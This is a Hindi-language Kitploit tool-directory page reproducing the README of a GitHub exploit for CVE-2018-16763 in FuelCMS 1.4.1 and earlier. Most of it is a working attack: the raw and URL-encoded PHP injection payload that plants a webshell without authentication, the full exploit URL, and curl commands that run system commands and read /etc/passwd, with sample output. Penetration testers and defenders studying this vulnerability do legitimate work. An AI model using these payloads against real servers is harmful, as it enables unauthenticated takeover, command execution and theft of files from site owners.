Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-16763-FuelCMS-1.4.1-RCE — FuelCMS <= 1.4.1 पर CVE-2018-16763 के लिए RCE ट्रिगर करने हेतु एक्सप्लॉइट और इंटरैक्टिव शेल। | Kitploit
उपकरण/GitHubGitHub/p0dalirius/cve-2018-16763-fuelcms-1.4.1-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubp0dalirius/cve-2018-16763-fuelcms-1.4.1-rce

CVE-2018-16763-FuelCMS-1.4.1-RCE

FuelCMS <= 1.4.1 पर CVE-2018-16763 के लिए RCE ट्रिगर करने हेतु एक्सप्लॉइट और इंटरैक्टिव शेल।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट
2631 साल पहलेKitploit द्वारा समीक्षित

CVE-2018-16763 - FuelCMS <= 1.4.1 RCE

FuelCMS <= 1.4.1 पर CVE-2018-16763 के लिए RCE ट्रिगर करने वाला एक्सप्लॉइट तथा इंटरैक्टिव शेल।
GitHub release (latest by date) YouTube Channel Subscribers

विशेषताएँ

  • CVE-2018-16763 का उपयोग करके FuelCMS में एक php वेबशेल API को स्वचालित रूप से अपलोड करता है।
  • ?action=exec के साथ API के माध्यम से सिस्टम कमांड निष्पादित करता है।
  • ?action=download के द्वारा दूरस्थ सिस्टम से आपकी हमलावर मशीन पर फ़ाइलें डाउनलोड करता है।

उपयोग

आवश्यकताएँ: कुछ भी आवश्यक नहीं है; यह एक्सप्लॉइट बिना प्रमाणीकरण के काम करता है।

चरण 1: वेबशेल प्लगइन अपलोड करें

सबसे पहले, कमांड निष्पादित करने और दूरस्थ फ़ाइलें डाउनलोड करने के लिए आपको इंटरैक्टिव console.py प्रारंभ करना होगा। यह filter पैरामीटर में CVE-2018-16763 php कोड इंजेक्शन का उपयोग करते हुए, file_put_contents के माध्यम से FuelCMS में एक php वेबशेल API अपलोड करेगा। उपयोग किया गया पेलोड निम्नलिखित है:

root@kitploit:~
'+pi(print($a='file_put_contents'))+$a($_POST["d0eb3f9a"],$_POST["9bc30f43"])+'

यह urlencoded पेलोड निम्न प्रकार देता है:

root@kitploit:~
%27%2Bpi%28print%28%24a%3D%27file%5Fput%5Fcontents%27%29%29%2B%24a%28%24%5FPOST%5B%22d0eb3f9a%22%5D%2C%24%5FPOST%5B%229bc30f43%22%5D%29%2B%27

अंतिम एक्सप्लॉइट URL है:

root@kitploit:~
http://127.0.0.1:10080/fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27file%5Fput%5Fcontents%27%29%29%2B%24a%28%24%5FPOST%5B%22d0eb3f9a%22%5D%2C%24%5FPOST%5B%229bc30f43%22%5D%29%2B%27

अब इंटरैक्टिव console.py, Fuel CMS में ./webshell/webshell.php अपलोड करने के लिए इस URL पर एक POST अनुरोध भेजता है।

चरण 2.1: कमांड निष्पादित करना

अब आप action=exec&cmd=id के साथ http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php पर GET या POST अनुरोध भेजकर कमांड निष्पादित कर सकते हैं:

root@kitploit:~
$ curl -X POST 'http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php' --data "action=exec&cmd=id"
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"}

आप इसे ब्राउज़र से GET अनुरोध द्वारा भी एक्सेस कर सकते हैं।

चरण 2.2: फ़ाइलें डाउनलोड करना

आप action=download&cmd=/etc/passwd के साथ http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php पर GET या POST अनुरोध भेजकर दूरस्थ फ़ाइलें भी डाउनलोड कर सकते हैं:

root@kitploit:~
$ curl -X POST 'http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/usr/sbin/nologin

आप ब्राउज़र से GET अनुरोध के माध्यम से भी दूरस्थ फ़ाइल डाउनलोड कर सकते हैं।

चरण 3: इंटरैक्टिव कंसोल

जब आपका वेबशेल सक्रिय हो, तो आप कमांड निष्पादित करने और दूरस्थ फ़ाइलें डाउनलोड करने के लिए इंटरैक्टिव console.py का उपयोग कर सकते हैं।

https://user-images.githubusercontent.com/79218792/171498197-2fb8a7bd-45b0-4fd7-86a1-9bb74aa31664.mp4

संदर्भ

  • https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4
टूल डाउनलोड करें